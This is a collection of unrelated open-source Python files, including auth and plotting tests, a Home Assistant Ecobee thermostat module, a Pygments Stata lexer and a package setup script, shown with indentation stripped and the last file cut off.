u"""Test auth.guest
:copyright: Copyright (c) 2019 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
def test_happy_path(auth_fc):
fc = auth_fc
from pykern import pkconfig, pkunit, pkio
from pykern.pkunit import pkok, pkre, pkeq
from pykern.pkdebug import pkdp
import re
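# Guest login should succeed and grant an authenticated session, so the
# listSimulations call below works without any further auth.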
fc.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type})
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
fc.sr_auth_state(
avatarUrl=None,
displayName='Guest User',
guestIsOnlyMethod=False,
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=False,
method='guest',
needCompleteRegistration=False,
userName=None,
visibleMethods=['email'],
)
def test_timeout(auth_fc):
fc = auth_fc
from pykern import pkconfig, pkunit, pkio
from pykern import pkjson
from pykern.pkdebug import pkdp
from pykern.pkunit import pkok, pkre, pkeq, pkexcept
import re
r = fc.sr_get('authGuestLogin', {'simulation_type': fc.sr_sim_type}, redirect=False)
pkeq(200, r.status_code)
d = pkjson.load_any(r.data)
pkeq(True, d.authState.isLoggedIn)
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
fc.sr_auth_state(
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=False,
)
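# Advance the server clock by two days; the guest login should now be expired.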
fc.sr_get_json('adjustTime', params={'days': '2'})
fc.sr_auth_state(
isGuestUser=True,
isLoggedIn=True,
isLoginExpired=True,
)
with pkexcept('SRException.*guest-expired'):
fc.sr_post('listSimulations', {'simulationType': fc.sr_sim_type})
|
"""This example downloads activity tags for a given floodlight activity."""
import argparse
import sys
from apiclient import sample_tools
from oauth2client import client
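# Example invocation (hypothetical script name and IDs; real values come from
# your DCM account):
#   $ python download_floodlight_tag.py 1234567 89012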
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'profile_id', type=int,
help='The ID of the profile to download tags for')
argparser.add_argument(
'activity_id', type=int,
help='The ID of the floodlight activity to download tags for')
def main(argv):
# Authenticate and construct service.
service, flags = sample_tools.init(
argv, 'dfareporting', 'v2.0', __doc__, __file__, parents=[argparser],
scope=['https://www.googleapis.com/auth/dfareporting',
'https://www.googleapis.com/auth/dfatrafficking'])
profile_id = flags.profile_id
activity_id = flags.activity_id
try:
# Construct the request.
request = service.floodlightActivities().generatetag(
profileId=profile_id, floodlightActivityId=activity_id)
# Execute request and print response.
response = request.execute()
print response['floodlightActivityTag']
except client.AccessTokenRefreshError:
print ('The credentials have been revoked or expired, please re-run the '
'application to re-authorize')
if __name__ == '__main__':
main(sys.argv)
|
"""
Platform for Ecobee Thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.ecobee/
"""
import logging
import voluptuous as vol
from homeassistant.components import ecobee
from homeassistant.components.climate import (
DOMAIN, STATE_COOL, STATE_HEAT, STATE_AUTO, STATE_IDLE, ClimateDevice,
ATTR_TARGET_TEMP_LOW, ATTR_TARGET_TEMP_HIGH, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_AWAY_MODE, SUPPORT_HOLD_MODE, SUPPORT_OPERATION_MODE,
SUPPORT_TARGET_HUMIDITY_LOW, SUPPORT_TARGET_HUMIDITY_HIGH,
SUPPORT_AUX_HEAT, SUPPORT_TARGET_TEMPERATURE_HIGH, SUPPORT_FAN_MODE,
SUPPORT_TARGET_TEMPERATURE_LOW, STATE_OFF)
from homeassistant.const import (
ATTR_ENTITY_ID, STATE_ON, ATTR_TEMPERATURE, TEMP_FAHRENHEIT)
import homeassistant.helpers.config_validation as cv
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
ATTR_FAN_MIN_ON_TIME = 'fan_min_on_time'
ATTR_RESUME_ALL = 'resume_all'
DEFAULT_RESUME_ALL = False
TEMPERATURE_HOLD = 'temp'
VACATION_HOLD = 'vacation'
AWAY_MODE = 'awayMode'
DEPENDENCIES = ['ecobee']
SERVICE_SET_FAN_MIN_ON_TIME = 'ecobee_set_fan_min_on_time'
SERVICE_RESUME_PROGRAM = 'ecobee_resume_program'
SET_FAN_MIN_ON_TIME_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_FAN_MIN_ON_TIME): vol.Coerce(int),
})
RESUME_PROGRAM_SCHEMA = vol.Schema({
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Optional(ATTR_RESUME_ALL, default=DEFAULT_RESUME_ALL): cv.boolean,
})
SUPPORT_FLAGS = (SUPPORT_TARGET_TEMPERATURE | SUPPORT_AWAY_MODE |
SUPPORT_HOLD_MODE | SUPPORT_OPERATION_MODE |
SUPPORT_TARGET_HUMIDITY_LOW | SUPPORT_TARGET_HUMIDITY_HIGH |
SUPPORT_AUX_HEAT | SUPPORT_TARGET_TEMPERATURE_HIGH |
SUPPORT_TARGET_TEMPERATURE_LOW | SUPPORT_FAN_MODE)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Ecobee Thermostat Platform."""
if discovery_info is None:
return
data = ecobee.NETWORK
hold_temp = discovery_info['hold_temp']
_LOGGER.info(
"Loading ecobee thermostat component with hold_temp set to %s",
hold_temp)
devices = [Thermostat(data, index, hold_temp)
for index in range(len(data.ecobee.thermostats))]
add_entities(devices)
def fan_min_on_time_set_service(service):
"""Set the minimum fan on time on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
fan_min_on_time = service.data[ATTR_FAN_MIN_ON_TIME]
if entity_id:
target_thermostats = [device for device in devices
if device.entity_id in entity_id]
else:
target_thermostats = devices
for thermostat in target_thermostats:
thermostat.set_fan_min_on_time(str(fan_min_on_time))
thermostat.schedule_update_ha_state(True)
def resume_program_set_service(service):
"""Resume the program on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
resume_all = service.data.get(ATTR_RESUME_ALL)
if entity_id:
target_thermostats = [device for device in devices
if device.entity_id in entity_id]
else:
target_thermostats = devices
for thermostat in target_thermostats:
thermostat.resume_program(resume_all)
thermostat.schedule_update_ha_state(True)
hass.services.register(
DOMAIN, SERVICE_SET_FAN_MIN_ON_TIME, fan_min_on_time_set_service,
schema=SET_FAN_MIN_ON_TIME_SCHEMA)
hass.services.register(
DOMAIN, SERVICE_RESUME_PROGRAM, resume_program_set_service,
schema=RESUME_PROGRAM_SCHEMA)
class Thermostat(ClimateDevice):
"""A thermostat class for Ecobee."""
def __init__(self, data, thermostat_index, hold_temp):
"""Initialize the thermostat."""
self.data = data
self.thermostat_index = thermostat_index
self.thermostat = self.data.ecobee.get_thermostat(
self.thermostat_index)
self._name = self.thermostat['name']
self.hold_temp = hold_temp
self.vacation = None
self._climate_list = self.climate_list
self._operation_list = ['auto', 'auxHeatOnly', 'cool',
'heat', 'off']
self._fan_list = ['auto', 'on']
self.update_without_throttle = False
def update(self):
"""Get the latest state from the thermostat."""
if self.update_without_throttle:
self.data.update(no_throttle=True)
self.update_without_throttle = False
else:
self.data.update()
self.thermostat = self.data.ecobee.get_thermostat(
self.thermostat_index)
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
@property
def name(self):
"""Return the name of the Ecobee Thermostat."""
return self.thermostat['name']
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def current_temperature(self):
"""Return the current temperature."""
return self.thermostat['runtime']['actualTemperature'] / 10.0
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if self.current_operation == STATE_AUTO:
return self.thermostat['runtime']['desiredHeat'] / 10.0
return None
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if self.current_operation == STATE_AUTO:
return self.thermostat['runtime']['desiredCool'] / 10.0
return None
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self.current_operation == STATE_AUTO:
return None
if self.current_operation == STATE_HEAT:
return self.thermostat['runtime']['desiredHeat'] / 10.0
if self.current_operation == STATE_COOL:
return self.thermostat['runtime']['desiredCool'] / 10.0
return None
@property
def fan(self):
"""Return the current fan status."""
if 'fan' in self.thermostat['equipmentStatus']:
return STATE_ON
return STATE_OFF
@property
def current_fan_mode(self):
"""Return the fan setting."""
return self.thermostat['runtime']['desiredFanMode']
@property
def current_hold_mode(self):
"""Return current hold mode."""
mode = self._current_hold_mode
return None if mode == AWAY_MODE else mode
@property
def fan_list(self):
"""Return the available fan modes."""
return self._fan_list
@property
def _current_hold_mode(self):
events = self.thermostat['events']
for event in events:
if event['running']:
if event['type'] == 'hold':
if event['holdClimateRef'] == 'away':
if int(event['endDate'][0:4]) - \
int(event['startDate'][0:4]) <= 1:
# A temporary hold from away climate is a hold
return 'away'
# A permanent hold from away climate
return AWAY_MODE
if event['holdClimateRef'] != "":
# Any other hold based on climate
return event['holdClimateRef']
# Any hold not based on a climate is a temp hold
return TEMPERATURE_HOLD
if event['type'].startswith('auto'):
# All auto modes are treated as holds
return event['type'][4:].lower()
if event['type'] == 'vacation':
self.vacation = event['name']
return VACATION_HOLD
return None
@property
def current_operation(self):
"""Return current operation."""
if self.operation_mode == 'auxHeatOnly' or \
self.operation_mode == 'heatPump':
return STATE_HEAT
return self.operation_mode
@property
def operation_list(self):
"""Return the operation modes list."""
return self._operation_list
@property
def operation_mode(self):
"""Return current operation ie. heat, cool, idle."""
return self.thermostat['settings']['hvacMode']
@property
def mode(self):
"""Return current mode, as the user-visible name."""
cur = self.thermostat['program']['currentClimateRef']
climates = self.thermostat['program']['climates']
current = list(filter(lambda x: x['climateRef'] == cur, climates))
return current[0]['name']
@property
def fan_min_on_time(self):
"""Return current fan minimum on time."""
return self.thermostat['settings']['fanMinOnTime']
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
# Move these to Thermostat Device and make them global
status = self.thermostat['equipmentStatus']
operation = None
if status == '':
operation = STATE_IDLE
elif 'Cool' in status:
operation = STATE_COOL
elif 'auxHeat' in status:
operation = STATE_HEAT
elif 'heatPump' in status:
operation = STATE_HEAT
else:
operation = status
return {
"actual_humidity": self.thermostat['runtime']['actualHumidity'],
"fan": self.fan,
"climate_mode": self.mode,
"operation": operation,
"climate_list": self.climate_list,
"fan_min_on_time": self.fan_min_on_time
}
@property
def is_away_mode_on(self):
"""Return true if away mode is on."""
return self._current_hold_mode == AWAY_MODE
@property
def is_aux_heat_on(self):
"""Return true if aux heater."""
return 'auxHeat' in self.thermostat['equipmentStatus']
def turn_away_mode_on(self):
"""Turn away mode on by setting it on away hold indefinitely."""
if self._current_hold_mode != AWAY_MODE:
self.data.ecobee.set_climate_hold(self.thermostat_index, 'away',
'indefinite')
self.update_without_throttle = True
def turn_away_mode_off(self):
"""Turn away off."""
if self._current_hold_mode == AWAY_MODE:
self.data.ecobee.resume_program(self.thermostat_index)
self.update_without_throttle = True
def set_hold_mode(self, hold_mode):
"""Set hold mode (away, home, temp, sleep, etc.)."""
hold = self.current_hold_mode
if hold == hold_mode:
# no change, so no action required
return
if hold_mode == 'None' or hold_mode is None:
if hold == VACATION_HOLD:
self.data.ecobee.delete_vacation(
self.thermostat_index, self.vacation)
else:
self.data.ecobee.resume_program(self.thermostat_index)
else:
if hold_mode == TEMPERATURE_HOLD:
self.set_temp_hold(self.current_temperature)
else:
self.data.ecobee.set_climate_hold(
self.thermostat_index, hold_mode, self.hold_preference())
self.update_without_throttle = True
def set_auto_temp_hold(self, heat_temp, cool_temp):
"""Set temperature hold in auto mode."""
if cool_temp is not None:
cool_temp_setpoint = cool_temp
else:
cool_temp_setpoint = (
self.thermostat['runtime']['desiredCool'] / 10.0)
if heat_temp is not None:
heat_temp_setpoint = heat_temp
else:
heat_temp_setpoint = (
self.thermostat['runtime']['desiredHeat'] / 10.0)
self.data.ecobee.set_hold_temp(self.thermostat_index,
cool_temp_setpoint, heat_temp_setpoint,
self.hold_preference())
_LOGGER.debug("Setting ecobee hold_temp to: heat=%s, is=%s, "
"cool=%s, is=%s", heat_temp,
isinstance(heat_temp, (int, float)), cool_temp,
isinstance(cool_temp, (int, float)))
self.update_without_throttle = True
def set_fan_mode(self, fan_mode):
"""Set the fan mode. Valid values are "on" or "auto"."""
if (fan_mode.lower() != STATE_ON) and (fan_mode.lower() != STATE_AUTO):
error = "Invalid fan_mode value: Valid values are 'on' or 'auto'"
_LOGGER.error(error)
return
cool_temp = self.thermostat['runtime']['desiredCool'] / 10.0
heat_temp = self.thermostat['runtime']['desiredHeat'] / 10.0
self.data.ecobee.set_fan_mode(self.thermostat_index, fan_mode,
cool_temp, heat_temp,
self.hold_preference())
_LOGGER.info("Setting fan mode to: %s", fan_mode)
def set_temp_hold(self, temp):
"""Set temperature hold in modes other than auto.
Ecobee API: It is good practice to set the heat and cool hold
temperatures to be the same, if the thermostat is in either heat, cool,
auxHeatOnly, or off mode. If the thermostat is in auto mode, an
additional rule is required. The cool hold temperature must be greater
than the heat hold temperature by at least the amount in the
heatCoolMinDelta property.
https://www.ecobee.com/home/developer/api/examples/ex5.shtml
"""
if self.current_operation == STATE_HEAT or self.current_operation == \
STATE_COOL:
heat_temp = temp
cool_temp = temp
else:
delta = self.thermostat['settings']['heatCoolMinDelta'] / 10
heat_temp = temp - delta
cool_temp = temp + delta
self.set_auto_temp_hold(heat_temp, cool_temp)
def set_temperature(self, **kwargs):
"""Set new target temperature."""
low_temp = kwargs.get(ATTR_TARGET_TEMP_LOW)
high_temp = kwargs.get(ATTR_TARGET_TEMP_HIGH)
temp = kwargs.get(ATTR_TEMPERATURE)
if self.current_operation == STATE_AUTO and \
(low_temp is not None or high_temp is not None):
self.set_auto_temp_hold(low_temp, high_temp)
elif temp is not None:
self.set_temp_hold(temp)
else:
_LOGGER.error(
"Missing valid arguments for set_temperature in %s", kwargs)
def set_humidity(self, humidity):
"""Set the humidity level."""
self.data.ecobee.set_humidity(self.thermostat_index, humidity)
def set_operation_mode(self, operation_mode):
"""Set HVAC mode (auto, auxHeatOnly, cool, heat, off)."""
self.data.ecobee.set_hvac_mode(self.thermostat_index, operation_mode)
self.update_without_throttle = True
def set_fan_min_on_time(self, fan_min_on_time):
"""Set the minimum fan on time."""
self.data.ecobee.set_fan_min_on_time(
self.thermostat_index, fan_min_on_time)
self.update_without_throttle = True
def resume_program(self, resume_all):
"""Resume the thermostat schedule program."""
self.data.ecobee.resume_program(
self.thermostat_index, 'true' if resume_all else 'false')
self.update_without_throttle = True
def hold_preference(self):
"""Return user preference setting for hold time."""
# Values returned from thermostat are 'useEndTime4hour',
# 'useEndTime2hour', 'nextTransition', 'indefinite', 'askMe'
default = self.thermostat['settings']['holdAction']
if default == 'nextTransition':
return default
# add further conditions if other hold durations should be
# supported; note that this should not include 'indefinite'
# as an indefinite away hold is interpreted as away_mode
return 'nextTransition'
@property
def climate_list(self):
"""Return the list of climates currently available."""
climates = self.thermostat['program']['climates']
return list(map((lambda x: x['name']), climates))
|
"""Tests for Keras Vis utils."""
from tensorflow.python import keras
from tensorflow.python.keras.utils import vis_utils
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class ModelToDotFormatTest(test.TestCase):
def test_plot_model_cnn(self):
model = keras.Sequential()
model.add(
keras.layers.Conv2D(
filters=2, kernel_size=(2, 3), input_shape=(3, 5, 5), name='conv'))
model.add(keras.layers.Flatten(name='flat'))
model.add(keras.layers.Dense(5, name='dense'))
dot_img_file = 'model_1.png'
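# plot_model depends on the optional pydot/graphviz packages; if they are
# missing it raises ImportError, which these tests treat as a skip.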
try:
vis_utils.plot_model(
model, to_file=dot_img_file, show_shapes=True, show_dtype=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
def test_plot_model_with_wrapped_layers_and_models(self):
inputs = keras.Input(shape=(None, 3))
lstm = keras.layers.LSTM(6, return_sequences=True, name='lstm')
x = lstm(inputs)
# Add layer inside a Wrapper
bilstm = keras.layers.Bidirectional(
keras.layers.LSTM(16, return_sequences=True, name='bilstm'))
x = bilstm(x)
# Add model inside a Wrapper
submodel = keras.Sequential(
[keras.layers.Dense(32, name='dense', input_shape=(None, 32))]
)
wrapped_dense = keras.layers.TimeDistributed(submodel)
x = wrapped_dense(x)
# Add shared submodel
outputs = submodel(x)
model = keras.Model(inputs, outputs)
dot_img_file = 'model_2.png'
try:
vis_utils.plot_model(
model,
to_file=dot_img_file,
show_shapes=True,
show_dtype=True,
expand_nested=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
def test_plot_model_with_add_loss(self):
inputs = keras.Input(shape=(None, 3))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
model.add_loss(math_ops.reduce_mean(outputs))
dot_img_file = 'model_3.png'
try:
vis_utils.plot_model(
model,
to_file=dot_img_file,
show_shapes=True,
show_dtype=True,
expand_nested=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
model = keras.Sequential([
keras.Input(shape=(None, 3)), keras.layers.Dense(1)])
model.add_loss(math_ops.reduce_mean(model.output))
dot_img_file = 'model_4.png'
try:
vis_utils.plot_model(
model,
to_file=dot_img_file,
show_shapes=True,
show_dtype=True,
expand_nested=True)
self.assertTrue(file_io.file_exists_v2(dot_img_file))
file_io.delete_file_v2(dot_img_file)
except ImportError:
pass
if __name__ == '__main__':
test.main()
|
"""
pygments.lexers.stata
~~~~~~~~~~~~~~~~~~~~~
Lexer for Stata
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default, include, words
from pygments.token import Comment, Keyword, Name, Number, \
String, Text, Operator
from pygments.lexers._stata_builtins import builtins_base, builtins_functions
__all__ = ['StataLexer']
class StataLexer(RegexLexer):
"""
For `Stata <http://www.stata.com/>`_ do files.
.. versionadded:: 2.2
"""
# Syntax based on
# - http://fmwww.bc.edu/RePEc/bocode/s/synlightlist.ado
# - https://github.com/isagalaev/highlight.js/blob/master/src/languages/stata.js
# - https://github.com/jpitblado/vim-stata/blob/master/syntax/stata.vim
name = 'Stata'
aliases = ['stata', 'do']
filenames = ['*.do', '*.ado']
mimetypes = ['text/x-stata', 'text/stata', 'application/x-stata']
flags = re.MULTILINE | re.DOTALL
tokens = {
'root': [
include('comments'),
include('strings'),
include('macros'),
include('numbers'),
include('keywords'),
include('operators'),
include('format'),
(r'.', Text),
],
# Comments are a complicated beast in Stata because they can be
# nested and there are a few corner cases with that. See:
# - github.com/kylebarron/language-stata/issues/90
# - statalist.org/forums/forum/general-stata-discussion/general/1448244
'comments': [
(r'(^//|(?<=\s)//)(?!/)', Comment.Single, 'comments-double-slash'),
(r'^\s*\*', Comment.Single, 'comments-star'),
(r'/\*', Comment.Multiline, 'comments-block'),
(r'(^///|(?<=\s)///)', Comment.Special, 'comments-triple-slash')
],
'comments-block': [
(r'/\*', Comment.Multiline, '#push'),
# this ends and restarts a comment block. but need to catch this so
# that it doesn't start _another_ level of comment blocks
(r'\*/\*', Comment.Multiline),
(r'(\*/\s+\*(?!/)[^\n]*)|(\*/)', Comment.Multiline, '#pop'),
# Match anything else as a character inside the comment
(r'.', Comment.Multiline),
],
'comments-star': [
(r'///.*?\n', Comment.Single,
('#pop', 'comments-triple-slash')),
(r'(^//|(?<=\s)//)(?!/)', Comment.Single,
('#pop', 'comments-double-slash')),
(r'/\*', Comment.Multiline, 'comments-block'),
(r'.(?=\n)', Comment.Single, '#pop'),
(r'.', Comment.Single),
],
'comments-triple-slash': [
(r'\n', Comment.Special, '#pop'),
# A // breaks out of a comment for the rest of the line
(r'//.*?(?=\n)', Comment.Single, '#pop'),
(r'.', Comment.Special),
],
'comments-double-slash': [
(r'\n', Text, '#pop'),
(r'.', Comment.Single),
],
# `"compound string"' and regular "string"; note the former are
# nested.
'strings': [
(r'`"', String, 'string-compound'),
(r'(?<!`)"', String, 'string-regular'),
],
'string-compound': [
(r'`"', String, '#push'),
(r'"\'', String, '#pop'),
(r'\\\\|\\"|\\\$|\\`|\\\n', String.Escape),
include('macros'),
(r'.', String)
],
'string-regular': [
(r'(")(?!\')|(?=\n)', String, '#pop'),
(r'\\\\|\\"|\\\$|\\`|\\\n', String.Escape),
include('macros'),
(r'.', String)
],
# A local is usually
# `\w{0,31}'
# `:extended macro'
# `=expression'
# `[rsen](results)'
# `(++--)scalar(++--)'
#
# However, there are all sorts of weird rules wrt edge
# cases. Instead of writing 27 exceptions, anything inside
# `' is a local.
#
# A global is more restricted, so we do follow rules. Note only
# locals explicitly enclosed ${} can be nested.
'macros': [
(r'\$(\{|(?=[$`]))', Name.Variable.Global, 'macro-global-nested'),
(r'\$', Name.Variable.Global, 'macro-global-name'),
(r'`', Name.Variable, 'macro-local'),
],
'macro-local': [
(r'`', Name.Variable, '#push'),
(r"'", Name.Variable, '#pop'),
(r'\$(\{|(?=[$`]))', Name.Variable.Global, 'macro-global-nested'),
(r'\$', Name.Variable.Global, 'macro-global-name'),
(r'.', Name.Variable), # fallback
],
'macro-global-nested': [
(r'\$(\{|(?=[$`]))', Name.Variable.Global, '#push'),
(r'\}', Name.Variable.Global, '#pop'),
(r'\$', Name.Variable.Global, 'macro-global-name'),
(r'`', Name.Variable, 'macro-local'),
(r'\w', Name.Variable.Global), # fallback
default('#pop'),
],
'macro-global-name': [
(r'\$(\{|(?=[$`]))', Name.Variable.Global, 'macro-global-nested', '#pop'),
(r'\$', Name.Variable.Global, 'macro-global-name', '#pop'),
(r'`', Name.Variable, 'macro-local', '#pop'),
(r'\w{1,32}', Name.Variable.Global, '#pop'),
],
# Built in functions and statements
'keywords': [
(words(builtins_functions, prefix = r'\b', suffix = r'(?=\()'),
Name.Function),
(words(builtins_base, prefix = r'(^\s*|\s)', suffix = r'\b'),
Keyword),
],
# http://www.stata.com/help.cgi?operators
'operators': [
(r'-|==|<=|>=|<|>|&|!=', Operator),
(r'\*|\+|\^|/|!|~|==|~=', Operator)
],
# Stata numbers
'numbers': [
# decimal number
(r'\b[+-]?([0-9]+(\.[0-9]+)?|\.[0-9]+|\.)([eE][+-]?[0-9]+)?[i]?\b',
Number),
],
# Stata formats
'format': [
(r'%-?\d{1,2}(\.\d{1,2})?[gfe]c?', Name.Other),
(r'%(21x|16H|16L|8H|8L)', Name.Other),
(r'%-?(tc|tC|td|tw|tm|tq|th|ty|tg)\S{0,32}', Name.Other),
(r'%[-~]?\d{1,4}s', Name.Other),
]
}
|
from oslo_log import log as logging
from heat_integrationtests.common import test
LOG = logging.getLogger(__name__)
class CeilometerAlarmTest(test.HeatIntegrationTest):
"""Class is responsible for testing of ceilometer usage."""
def setUp(self):
super(CeilometerAlarmTest, self).setUp()
self.client = self.orchestration_client
self.template = self._load_template(__file__,
'test_ceilometer_alarm.yaml',
'templates')
def check_instance_count(self, stack_identifier, expected):
stack = self.client.stacks.get(stack_identifier)
actual = self._stack_output(stack, 'asg_size')
if actual != expected:
LOG.warning('check_instance_count exp:%d, act:%s', expected, actual)
return actual == expected
def test_alarm(self):
"""Confirm we can create an alarm and trigger it."""
# 1. create the stack
stack_identifier = self.stack_create(template=self.template)
# 2. send ceilometer a metric (should cause the alarm to fire)
sample = {}
sample['counter_type'] = 'gauge'
sample['counter_name'] = 'test_meter'
sample['counter_volume'] = 1
sample['counter_unit'] = 'count'
sample['resource_metadata'] = {'metering.stack_id':
stack_identifier.split('/')[-1]}
sample['resource_id'] = 'shouldnt_matter'
self.metering_client.samples.create(**sample)
# 3. confirm we get a scaleup.
# Note: there is little point waiting more than 60s+time to scale up.
self.assertTrue(test.call_until_true(
120, 2, self.check_instance_count, stack_identifier, 2))
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import six
from six.moves import xrange
from nose.tools import assert_equal, assert_true
from matplotlib.testing.decorators import image_comparison, cleanup
from matplotlib.axes import Axes
import matplotlib.pyplot as plt
import numpy as np
@cleanup
def test_figure_label():
# pyplot figure creation, selection and closing with figure label and
# number
plt.close('all')
plt.figure('today')
plt.figure(3)
plt.figure('tomorrow')
plt.figure()
plt.figure(0)
plt.figure(1)
plt.figure(3)
assert_equal(plt.get_fignums(), [0, 1, 3, 4, 5])
assert_equal(plt.get_figlabels(), ['', 'today', '', 'tomorrow', ''])
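# Closing a figure number that does not exist is a no-op.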
plt.close(10)
plt.close()
plt.close(5)
plt.close('tomorrow')
assert_equal(plt.get_fignums(), [0, 1])
assert_equal(plt.get_figlabels(), ['', 'today'])
@cleanup
def test_fignum_exists():
# pyplot figure creation, selection and closing with fignum_exists
plt.figure('one')
plt.figure(2)
plt.figure('three')
plt.figure()
assert_equal(plt.fignum_exists('one'), True)
assert_equal(plt.fignum_exists(2), True)
assert_equal(plt.fignum_exists('three'), True)
assert_equal(plt.fignum_exists(4), True)
plt.close('one')
plt.close(4)
assert_equal(plt.fignum_exists('one'), False)
assert_equal(plt.fignum_exists(4), False)
@image_comparison(baseline_images=['figure_today'])
def test_figure():
# named figure support
fig = plt.figure('today')
ax = fig.add_subplot(111)
ax.set_title(fig.get_label())
ax.plot(list(xrange(5)))
# plot red line in a different figure.
plt.figure('tomorrow')
plt.plot([0, 1], [1, 0], 'r')
# Return to the original; make sure the red line is not there.
plt.figure('today')
plt.close('tomorrow')
@cleanup
def test_gca():
fig = plt.figure()
ax1 = fig.add_axes([0, 0, 1, 1])
assert_true(fig.gca(projection='rectilinear') is ax1)
assert_true(fig.gca() is ax1)
ax2 = fig.add_subplot(121, projection='polar')
assert_true(fig.gca() is ax2)
assert_true(fig.gca(polar=True) is ax2)
ax3 = fig.add_subplot(122)
assert_true(fig.gca() is ax3)
# the final request for a polar axes will end up creating one
# with a spec of 111.
assert_true(fig.gca(polar=True) is not ax3)
assert_true(fig.gca(polar=True) is not ax2)
assert_equal(fig.gca().get_geometry(), (1, 1, 1))
fig.sca(ax1)
assert_true(fig.gca(projection='rectilinear') is ax1)
assert_true(fig.gca() is ax1)
@image_comparison(baseline_images=['figure_suptitle'])
def test_suptitle():
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
fig.suptitle('hello', color='r')
fig.suptitle('title', color='g', rotation='30')
@cleanup
def test_suptitle_fontproperties():
from matplotlib.font_manager import FontProperties
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
fps = FontProperties(size='large', weight='bold')
txt = fig.suptitle('fontprops title', fontproperties=fps)
assert_equal(txt.get_fontsize(), fps.get_size_in_points())
assert_equal(txt.get_weight(), fps.get_weight())
@image_comparison(baseline_images=['alpha_background'],
# only test png and svg. The PDF output appears correct,
# but Ghostscript does not preserve the background color.
extensions=['png', 'svg'],
savefig_kwarg={'facecolor': (0, 1, 0.4),
'edgecolor': 'none'})
def test_alpha():
# We want an image which has a background color and an
# alpha of 0.4.
fig = plt.figure(figsize=[2, 1])
fig.set_facecolor((0, 1, 0.4))
fig.patch.set_alpha(0.4)
import matplotlib.patches as mpatches
fig.patches.append(mpatches.CirclePolygon([20, 20],
radius=15,
alpha=0.6,
facecolor='red'))
@cleanup
def test_too_many_figures():
import warnings
with warnings.catch_warnings(record=True) as w:
for i in range(22):
fig = plt.figure()
assert len(w) == 1
def test_iterability_axes_argument():
# This is a regression test for matplotlib/matplotlib#3196. If one of the
# arguments returned by _as_mpl_axes defines __getitem__ but is not
# iterable, this would raise an exception. This is because we check
# whether the arguments are iterable, and if so we try and convert them
# to a tuple. However, the ``iterable`` function returns True if
# __getitem__ is present, but some classes can define __getitem__ without
# being iterable. The tuple conversion is now done in a try...except in
# case it fails.
class MyAxes(Axes):
def __init__(self, *args, **kwargs):
kwargs.pop('myclass', None)
return Axes.__init__(self, *args, **kwargs)
class MyClass(object):
def __getitem__(self, item):
if item != 'a':
raise ValueError("item should be a")
def _as_mpl_axes(self):
return MyAxes, {'myclass': self}
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1, projection=MyClass())
plt.close(fig)
@cleanup
def test_set_fig_size():
fig = plt.figure()
# check figwidth
fig.set_figwidth(5)
assert_equal(fig.get_figwidth(), 5)
# check figheight
fig.set_figheight(1)
assert_equal(fig.get_figheight(), 1)
# check using set_size_inches
fig.set_size_inches(2, 4)
assert_equal(fig.get_figwidth(), 2)
assert_equal(fig.get_figheight(), 4)
# check using tuple to first argument
fig.set_size_inches((1, 3))
assert_equal(fig.get_figwidth(), 1)
assert_equal(fig.get_figheight(), 3)
@cleanup
def test_axes_remove():
fig, axes = plt.subplots(2, 2)
axes[-1, -1].remove()
for ax in axes.ravel()[:-1]:
assert ax in fig.axes
assert axes[-1, -1] not in fig.axes
assert_equal(len(fig.axes), 3)
def test_figaspect():
w, h = plt.figaspect(np.float64(2) / np.float64(1))
assert h / w == 2
w, h = plt.figaspect(2)
assert h / w == 2
w, h = plt.figaspect(np.zeros((1, 2)))
assert h / w == 0.5
w, h = plt.figaspect(np.zeros((2, 2)))
assert h / w == 1
if __name__ == "__main__":
import nose
nose.runmodule(argv=['-s', '--with-doctest'], exit=False)
|
import io
import os
import sys
from setuptools import setup
from setuptools import find_packages
with io.open('README.md', 'rt', encoding='utf8') as f:
README = f.read()
if sys.argv[-1] == 'test':
os.system('python -sm unittest discover tests "*_test.py"')
sys.exit(0)
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist')
os.system('twine upload dist/*')
sys.exit(0)
VERSION = '0.0.7'
REQUIRES = ['google-api-python-client>=1.5.3', 'pandas>=0.22.0', 'fire>=0.1.3']
GITHUB_URL = 'https://github.com/condad/google-objects'
setup(
name='google_objects',
packages=find_packages(),
version=VERSION,
description="A simple OO wrapper around Google's python API client",
long_description=README,
long_description_content_type='text/markdown',
author='Connor Sullivan',
